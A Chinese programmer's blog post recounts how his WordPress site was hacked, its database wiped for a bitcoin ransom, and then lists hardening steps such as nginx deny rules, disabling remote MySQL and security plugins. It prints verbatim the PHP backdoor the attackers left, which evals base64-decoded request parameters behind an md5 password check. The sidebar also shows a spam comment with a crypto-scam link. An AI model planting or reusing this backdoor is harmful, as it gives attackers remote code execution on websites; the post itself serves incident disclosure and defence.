Skip to content

四火的唠叨

一个纯正程序员的啰嗦

Menu
  • 所有文章
  • About Me
  • 关于四火
  • 旅行映像
  • 独立游戏
  • 资源链接
Menu

Blog 被黑记录

Posted on 01/25/202007/04/2022 by 四火
  • 1 被黑记录
  • 2 安全加固
    • 2.1 密码更换
    • 2.2 使用密钥登陆
    • 2.3 清理 php 文件
    • 2.4 Nginx 配置
    • 2.5 关闭 MySQL 的远程模式
    • 2.6 PHP 和 WordPress 升级
    • 2.7 几个有用的插件
    • 2.8 安全隐患扫描

最近这个 blog 被黑了,如果你恰巧那一天访问,你会看到所有数据都丢失了,网站打开的页面,是一个初始配置数据库连接的页面。我记得几个月前,这个 blog 曾经遭受过 XML-RPC 攻击,我当时把问题的分析和处理记录在了这里。这一次,可不只是网站拒绝服务这样的问题了,而是整个网站的数据库都被干掉了。

被黑记录

问题出现的时候,网站访问不了了,我登上 MySQL 数据库查看了一下,发现所有数据都删掉了,只留下了一个 WARNING 的表:

上面说的也很清楚,让我往指定地址打 0.08 个比特币,他们就可以把数据还给我,要不然 10 天以后就会把数据库里的数据公开。在 Bitcoin Abuse Database 上,我找到了类似的数条记录。

还好,我每天都有备份,因此丢失的数据其实比较少。当然了,这是我个人的 blog,并没有存放什么私密的信息。

之后,我留意到黑客在我的 WordPress 目录中留了一个后门文件:

?
1
2
cat wp-includes/.wp-config.php
<?php echo"abrval";error_reporting(0);if(isset($_REQUEST['lanfren']) && md5($_REQUEST['lanfren']) == '863b84c60e8377d9400b97e449a96e96' && isset($_REQUEST['lanfra'])) eval(base64_decode($_REQUEST['lanfra']));?>

在 wp-content/plugins/index.php 中,也加上了类似的内容。这段逻辑也不难理解,请求参数 lanfren 的串在 md5 之后,如果和指定串相等,就用 base64 解码 lanfra 的参数(估计参数值是一串代码),并使用 eval 执行。

但是这件事情倒是在催促我,即便是个人 blog 站点,必要的安全加固操作还是要做的。之前这些年来都没有出现问题,但是这次在 VPS 切换后没有几周,就出了这样的幺蛾子。

安全加固

下面就是一些必要的操作。

密码更换

首先,需要更换掉密码,主要包括 WordPress 的密码,以及 MySQL 的密码。

WordPress 存储密码的时候,是经过摘要了的,并非密码原文,但是更换密码依然是推荐的方式。

另外,我推荐大家都去‘;–have i been pwned? 这个网站上看一下自己的 email 账号信息有没有泄露,我的几个 email 里面,大部分都已经跪了。

这个网站上也有一个链接,链到 1password 上去,安装这个 app 以后,可以检查自己的密码是否已经泄露(它使用密码散列后的串来进行校验,因此不用担心在这一步泄露密码):

当然,记住那么多密码也是比较困难的一件事情,我使用密码管理软件 LastPass。

使用密钥登陆

以前这篇文章已经介绍过。

清理 php 文件

php 是真正的代码文件,访问就可以执行,因此这些文件是首先要认真对待的。

WordPress 默认的目录下,有一些 php 文件是可以拿掉的,这样就杜绝了用户的访问可能。哪怕这些文件都是有用的,也可以压缩存放到其它地方去。

有一些文件可以改名隐藏起来,比如登陆用的 wp-login.php。如果需要这个文件,不能删除或改名,但又不想用户访问,那就可以用.htaccess 或 Nginx 配置来保护起来。

Nginx 配置

有一些访问我是想屏蔽掉的,比如:

?
1
2
location ~ /(wp-content|uploads|images)/.*\.php$ { deny all; }
location ~ /wp-(config|mail|cron|activate|settings|load|blog-header|links-opml|signup|login)\.php$ { deny all; }

4xx 和 5xx 的页面也统统导向一个不暴露 Nginx 信息的页面:

?
1
error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 421 422 423 424 425 426 428 429 431 451 500 501 502 503 504 505 506 507 508 510 511 /error.html;

关闭 MySQL 的远程模式

编辑/etc/my.cnf,添加:

?
1
skip-networking

重启 MySQL:

?
1
lnmp mysql restart

这样就杜绝了远程访问数据库的可能,MySQL 只能通过 localhost 来访问。

PHP 和 WordPress 升级

PHP 的版本是 5.6.40 的,太老了。使用 lnmp 自带的升级工具 upgrade.sh 就可以完成。

还有一个事儿是 WordPress 升级,这个在管理台就可以完成。

几个有用的插件

第一个是 UpdraftPlus,这个比一般的备份功能更好的是,它把备份后的上传功能集成进去了,我配置了备份以后上传到另外一台 FTP 服务器的功能。

第二个是 Sucuri WordPress Plugin,有一些很实用的安全方面的功能,比如 WordPress 文件完整性检查,前面说的那个后门文件就是通过这个插件发现的。后来我使用了 Wordfence,这个功能要更加强大一些,防火墙和文件扫描功能尤其好用。

安全隐患扫描

网上有不少方便的扫描工具,比如 Website Vulnerability Scanner,下面这几个问题在 PHP 升级之后就都解决了:

还有一个是端口扫描,服务器开放的端口自己心中有数,比如可以使用这个工具。

文章未经特殊标明皆为本人原创,未经许可不得用于任何商业用途,转载请保持完整性并注明来源链接 《四火的唠叨》

×Scan to share with WeChat

你可能也喜欢看:

  1. HTTPS 升级
  2. Blog 安全问题小记
  3. VPS 迁移和网站备案
  4. 如何思考面向对象
  5. Chrome 插件开发

1 thought on “Blog 被黑记录”

  1. MatheMatrix says:
    01/27/2020 at 5:09 AM

    还好有备份…… 我每次写了文章都会做一个备份到本地和云端~

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

订阅·联系

四火,啰嗦的程序员一枚,现居西雅图

Amazon Google Groovy Hadoop Haskell Java JavaScript LeetCode Oracle Spark 互联网 亚马逊 前端 华为 历史 同步 团队 图解笔记 基础设施 工作 工作流 工具 工程师 应用系统 异步 微博 思考 技术 数据库 曼联 测试 生活 眼界 程序员 管理 系统设计 缓存 编程范型 美股 英语 西雅图 设计 问题 面向对象 面试

分类

  • Algorithm and Data Structure (30)
  • Concurrency and Asynchronization (6)
  • System Architecture and Design (43)
  • Distributed System (18)
  • Tools Frameworks and Libs (13)
  • Storage and Data Access (8)
  • Front-end Development (33)
  • Programming Languages and Paradigms (55)
  • Testing and Quality Assurance (4)
  • Network and Communication (6)
  • Authentication and Authorization (6)
  • Automation and Operation Excellence (13)
  • Machine Learning and Artificial Intelligence (6)
  • Product Design (7)
  • Hiring and Interviews (14)
  • Project and Team Management (14)
  • Engineering Culture (17)
  • Critical Thinking (25)
  • Career Growth (57)
  • Life Experience and Thoughts (45)

推荐文章

  • 聊一聊分布式系统中的时间
  • 谈谈分布式锁
  • 常见分布式系统设计图解(汇总)
  • 系统设计中的快速估算技巧
  • 从链表存在环的问题说起
  • 技术面试中,什么样的问题才是好问题?
  • 从物理时钟到逻辑时钟
  • 近期面试观摩的一些思考
  • RSA 背后的算法
  • 谈谈 Ops(汇总 + 最终篇):工具和实践
  • 不要让业务牵着鼻子走
  • 倔强的程序员
  • 谈谈微信的信息流
  • 评审的艺术——谈谈现实中的代码评审
  • Blog 安全问题小记
  • 求第 K 个数的问题
  • 一些前端框架的比较(下)——Ember.js 和 React
  • 一些前端框架的比较(上)——GWT、AngularJS 和 Backbone.js
  • 工作流系统的设计
  • Spark 的性能调优
  • “残酷” 的事实
  • 七年工作,几个故事
  • 从 Java 和 JavaScript 来学习 Haskell 和 Groovy(汇总)
  • 一道随机数题目的求解
  • 层次
  • Dynamo 的实现技术和去中心化
  • 也谈谈全栈工程师
  • 多重继承的演变
  • 编程范型:工具的选择
  • GWT 初体验
  • java.util.concurrent 并发包诸类概览
  • 从 DCL 的对象安全发布谈起
  • 不同团队的困惑
  • 不适合 Hadoop 解决的问题
  • 留心那些潜在的系统设计问题
  • 再谈大楼扔鸡蛋的问题
  • 几种华丽无比的开发方式
  • 我眼中的工程师文化
  • 观点的碰撞
  • 谈谈盗版软件问题
  • 对几个软件开发传统观点的质疑和反驳
  • MVC 框架的映射和解耦
  • 编程的未来
  • DAO 的演进
  • 致那些自嘲码农的苦逼程序员
  • Java 多线程发展简史
  • 珍爱生命,远离微博
  • 网站性能优化的三重境界
  • OSCache 框架源码解析
  • “ 你不适合做程序员”
  • 画圆画方的故事

近期评论

  • Ticket: TRANSACTION 1.922915 BTC. Go to withdrawal >> https://yandex.com/poll/enter/BXidu5Ewa8hnAFoFznqSi9?hs=20bd550f65c6e03103876b28cabc4da6& on 倔强的程序员
  • panshenlian.com on 初涉 ML Workflow 系统:Kubeflow Pipelines、Flyte 和 Metaflow
  • panzhixiang on 关于近期求职的近况和思考
  • Anonymous on 闲聊投资:亲自体验和护城河
  • 四火 on 关于近期求职的近况和思考
  • YC on 关于近期求职的近况和思考
  • mafulong on 常见分布式基础设施系统设计图解(四):分布式工作流系统
  • 四火 on 常见分布式基础设施系统设计图解(八):分布式键值存储系统
  • Anonymous on 我裸辞了
  • https://umlcn.com on 资源链接
© 2025 四火的唠叨 | Powered by Minimalist Blog WordPress Theme